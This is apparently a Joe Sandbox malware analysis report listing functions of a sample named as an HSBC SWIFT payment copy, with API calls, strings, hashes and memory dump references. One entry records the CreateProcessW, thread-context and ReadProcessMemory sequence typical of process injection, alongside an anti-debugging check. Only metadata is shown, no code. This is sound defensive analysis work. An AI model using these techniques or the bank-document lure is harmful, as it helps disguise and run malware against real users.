Instruction Fuzzy Hash: 00417C31B04178ABDF229B64FC557BE7FA2DB45300F684464EE82DB287D63C9D8483A1

Function 00727285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0075EA39
GetOpenFileNameW.COMDLG32(?), ref: 0075EA83

Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770

Part of subcall function 00740791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007407B0

Strings

X, xrefs: 0075EA51

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 69ecf77bc62dfa2de3a7a36565443ceaa17c224e93930b0a6067dc0c8c55c872
Instruction ID: 69c9f1e60116d2b202c5eaef527cb4993c2804b27fab458de2d274ebc39ae620
Opcode Fuzzy Hash: 69ecf77bc62dfa2de3a7a36565443ceaa17c224e93930b0a6067dc0c8c55c872
Instruction Fuzzy Hash: E021C671A00258DBCB459F94DC49BEE7BF8AF49315F00801AE908AB341DBFC5989CF91

Function 007898E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 007898F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0078990F

Strings

aut, xrefs: 00789909

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 2af48e45bab6930c001aa8f26aad93d27e7216c1c885e42a67894da0cae330c6
Instruction ID: 0c7e96f6213f52adb908d69c3cce80802c3c4684fa24937fd516658556938db1
Opcode Fuzzy Hash: 2af48e45bab6930c001aa8f26aad93d27e7216c1c885e42a67894da0cae330c6
Instruction Fuzzy Hash: 07D05E7954030DABDB50ABE0DC0EFDA773CE744701F0042B1FA94911E1EAB895988B95

Function 0079CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5adcb0f354c6965c33a8c652d2e7f903002fdb0d1fc521810eb4768cbb9137d4
Instruction ID: 4635ebe730a25b00aba89d3418f0a61d3fcaf9e2cf2716177b05b574d4989af0
Opcode Fuzzy Hash: 5adcb0f354c6965c33a8c652d2e7f903002fdb0d1fc521810eb4768cbb9137d4
Instruction Fuzzy Hash: EAF14571608300DFCB14DF28D484A6ABBE5FF89314F54892EF8999B252D738E945CF82

Function 0072434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00724370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00724415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00724432

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 0fe72163af047f1a79aba3995dc4de9d0d2ac1e6dbd40c50d540a761f4abf5a0
Instruction ID: 418d6177a9dc08fab8eb280e321410682912c3da8dd3d8e74c1237c3ae89e11f
Opcode Fuzzy Hash: 0fe72163af047f1a79aba3995dc4de9d0d2ac1e6dbd40c50d540a761f4abf5a0
Instruction Fuzzy Hash: 7131D2B0505751CFD720EF74E88469BBBF8FB48308F00492EF68AD6251E778A944CB56

Function 0074571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00745733

Part of subcall function 0074A16B: __NMSG_WRITE.LIBCMT ref: 0074A192
Part of subcall function 0074A16B: __NMSG_WRITE.LIBCMT ref: 0074A19C

__NMSG_WRITE.LIBCMT ref: 0074573A

Part of subcall function 0074A1C8: GetModuleFileNameW.KERNEL32(00000000,007E33BA,00000104,?,00000001,00000000), ref: 0074A25A
Part of subcall function 0074A1C8: ___crtMessageBoxW.LIBCMT ref: 0074A308

Part of subcall function 0074309F: ___crtCorExitProcess.LIBCMT ref: 007430A5
Part of subcall function 0074309F: ExitProcess.KERNEL32 ref: 007430AE

Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28

RtlAllocateHeap.NTDLL(01180000,00000000,00000001,00000000,?,?,?,00740DD3,?), ref: 0074575F

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: d1ad99e5fb682687c0457a0717e121d4d71f7d8d360505ee35191a4d7c9ef502
Instruction ID: 77e7f41c4d17dc7db7699e6f763af0e5a6fd393d12f752a3018db36554bc979a
Opcode Fuzzy Hash: d1ad99e5fb682687c0457a0717e121d4d71f7d8d360505ee35191a4d7c9ef502
Instruction Fuzzy Hash: EE01F171240B49EFE6123B38EC8AA2E7398DF82361F110535F5199B183DF7C9C008A65

Function 007898A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00789548,?,?,?,?,?,00000004), ref: 007898BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00789548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007898D1
CloseHandle.KERNEL32(00000000,?,00789548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007898D8

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 8bf241d5cca40605a6d809ad31956c140faf8a399d6e59e8b6bd2a752fdac086
Instruction ID: d4e8c3a26ff167a47067f16311411bbe94b1896c636033d9956a92440441e987
Opcode Fuzzy Hash: 8bf241d5cca40605a6d809ad31956c140faf8a399d6e59e8b6bd2a752fdac086
Instruction Fuzzy Hash: 77E08632281218BBDB312B94EC09FDA7F19AB47760F148121FB54690E087B51511979C

Function 00788D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00788D1B

Part of subcall function 00742D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00749A24), ref: 00742D69
Part of subcall function 00742D55: GetLastError.KERNEL32(00000000,?,00749A24), ref: 00742D7B

_free.LIBCMT ref: 00788D2C
_free.LIBCMT ref: 00788D3E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 45e6f448b51346fc5cf7e22f98bea526ea068230bb5f8e75ada5ed39abe16005
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: DAE012A1B4160186CB64B578A944A9313DC4F5C392F95091DB40DD7187DF6CF8938634

Function 0072A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0075FC01

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: b4c55a68bbbc5ec49a6a62badfa3c37aeb9f393a38a0b60c2baa7c0bb718b686
Instruction ID: 1897c06298688fe2a3ae73adaee43a246412561dafb895704278561072b3edf7
Opcode Fuzzy Hash: b4c55a68bbbc5ec49a6a62badfa3c37aeb9f393a38a0b60c2baa7c0bb718b686
Instruction Fuzzy Hash: 10225A70508361DFCB24DF24D494A6AB7E1BF45300F18896DE98A8B262D779ED85CB82

Function 00727A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00727AAB
_memmove.LIBCMT ref: 00727B16

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction ID: 53ba06e04f364fa404f5548704246d533454f57d6c0877590503e4b526a36b97
Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
Instruction Fuzzy Hash: 0631A4B1604616AFC708DF68D9D1D69B3A9FF48320715C629E519CB391EB38E920CB90

Function 007247D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00724834

Part of subcall function 0074336C: __lock.LIBCMT ref: 00743372
Part of subcall function 0074336C: DecodePointer.KERNEL32(00000001,?,00724849,00777C74), ref: 0074337E
Part of subcall function 0074336C: EncodePointer.KERNEL32(?,?,00724849,00777C74), ref: 00743389

Part of subcall function 007248FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00724915
Part of subcall function 007248FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0072492A

Part of subcall function 00723B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00723B68
Part of subcall function 00723B3A: IsDebuggerPresent.KERNEL32 ref: 00723B7A
Part of subcall function 00723B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,007E52F8,007E52E0,?,?), ref: 00723BEB
Part of subcall function 00723B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00723C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00724874

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 2b9e19fa0fed0fe132b4467bb5cea228551171227109499bb55d6fe1f3a320f3
Instruction ID: be8548b3c9fa14e3d026dc3807c4fefe9586d74ec4acde3dfed034c1254ccf7f
Opcode Fuzzy Hash: 2b9e19fa0fed0fe132b4467bb5cea228551171227109499bb55d6fe1f3a320f3
Instruction Fuzzy Hash: E111CDB1809395DBC700EF68EC8980ABBE8FF99750F10851EF1448B2B1DB789604CB96

Function 00740DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0074571C: __FF_MSGBANNER.LIBCMT ref: 00745733
Part of subcall function 0074571C: __NMSG_WRITE.LIBCMT ref: 0074573A
Part of subcall function 0074571C: RtlAllocateHeap.NTDLL(01180000,00000000,00000001,00000000,?,?,?,00740DD3,?), ref: 0074575F

std::exception::exception.LIBCMT ref: 00740DEC
__CxxThrowException@8.LIBCMT ref: 00740E01

Part of subcall function 0074859B: RaiseException.KERNEL32(?,?,?,007D9E78,00000000,?,?,?,?,00740E06,?,007D9E78,?,00000001), ref: 007485F0

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 95cbbaa997cab6a4fe1a82a630baa67e0df82807999739d33d54d3e12c521efe
Instruction ID: f837f4a3511a1f558b8b28c6f1bd94617eddd93ed46d0d6f764999424a825c33
Opcode Fuzzy Hash: 95cbbaa997cab6a4fe1a82a630baa67e0df82807999739d33d54d3e12c521efe
Instruction Fuzzy Hash: 96F0CD31A0031DA6CB10BEA8EC05ADF77AC9F01311F100429FE1496252DF789A55C5D1

Function 007453A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28

__lock_file.LIBCMT ref: 007453EB

Part of subcall function 00746C11: __lock.LIBCMT ref: 00746C34

__fclose_nolock.LIBCMT ref: 007453F6

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 70f2aad26e907a7ecb3f71cf630794507c0cad8b856ee165dda1104d77ee65b5
Instruction ID: 79b9c7d13b11a848eb2f3342d7f7c7aa838f6daf03e2234c9a29778fc75a5638
Opcode Fuzzy Hash: 70f2aad26e907a7ecb3f71cf630794507c0cad8b856ee165dda1104d77ee65b5
Instruction Fuzzy Hash: 73F09071901A08EBDB50AF65980A7AD66A06F41378F248209A464AB1C2DBBC9945AF62

Function 01F8129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01F81A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F81AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F81B13

Memory Dump Source

Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: 15029d2915ebe4b80330ea13ee55d18c3d66a93ce96e37fdeb16bd93b66ec10a
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: A812DE24E18658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CB5A

Function 0075FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0075FCB7

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 9e9f58a0f1c75a3b22a3f018a4a6cabf9ab0fea204df1f8dd646d289da5fa8f6
Instruction ID: 4df28604962f07c11fd208f66f00ecff66d7fd294663e3d056e0e0e156d620ee
Opcode Fuzzy Hash: 9e9f58a0f1c75a3b22a3f018a4a6cabf9ab0fea204df1f8dd646d289da5fa8f6
Instruction Fuzzy Hash: 0B411574604351DFDB24DF24C458B1ABBE0BF49314F0988ACE9998B362C339EC45CB92

Function 00727B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00727BB3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 2d859a7afaec70763d9e9456f73c516ef055629ab48e4600cc4653dc35de9cbe
Instruction ID: 6073cc52273b277f6e3f5c390b5e63ca96ef583040dc37ab4a97705b49309586
Opcode Fuzzy Hash: 2d859a7afaec70763d9e9456f73c516ef055629ab48e4600cc4653dc35de9cbe
Instruction Fuzzy Hash: 682148B2A04A19EBDB188F25F8417A97BB4FF14352F20C42EE886C5090EB78C6D4D755

Function 00724DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00724BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00724BEF

Part of subcall function 0074525B: __wfsopen.LIBCMT ref: 00745266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00724E0F

Part of subcall function 00724B6A: FreeLibrary.KERNEL32(00000000), ref: 00724BA4

Part of subcall function 00724C70: _memmove.LIBCMT ref: 00724CBA

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 17ba975727d94ccba7890cd8758434ee37ad5f1bb5405b4d8663d0d280ed24e0
Instruction ID: 01bd306e2899855c9fcc3b2297cdd9f8d8af023bb7fcf834da84541f8bca0005
Opcode Fuzzy Hash: 17ba975727d94ccba7890cd8758434ee37ad5f1bb5405b4d8663d0d280ed24e0
Instruction Fuzzy Hash: 7A11E731A00215EBDF20BF70DC1AFAD77A8AF84710F10842DF941A7181DBB999059B50

Function 0075FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0075FD91

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 35005851845d001ee65e4175331334a311457f619348229986816b87b060e60f
Instruction ID: 87f1e74644def41dd94df4a45ed08c2adeacbda5eb0498ca091a69e62c61f273
Opcode Fuzzy Hash: 35005851845d001ee65e4175331334a311457f619348229986816b87b060e60f
Instruction Fuzzy Hash: 082155B4608351DFCB14DF64D444B1ABBE0BF88314F04896CF98A47722D739E819CBA2

Function 0074072A Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48490cc749f089fccd437f18e97576b4738c0f8357ed3fcc7e238cb7430c94f3
Instruction ID: 4caf96c0569b1523586905ac52a911a406f7418865e11fd536cdecf240e63927
Opcode Fuzzy Hash: 48490cc749f089fccd437f18e97576b4738c0f8357ed3fcc7e238cb7430c94f3
Instruction Fuzzy Hash: 9301FE365401505FEB33AA64BC41AFDF3D8EFC0761B18846EED4492854D7786C44CBD6

Function 00744863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 007448A6

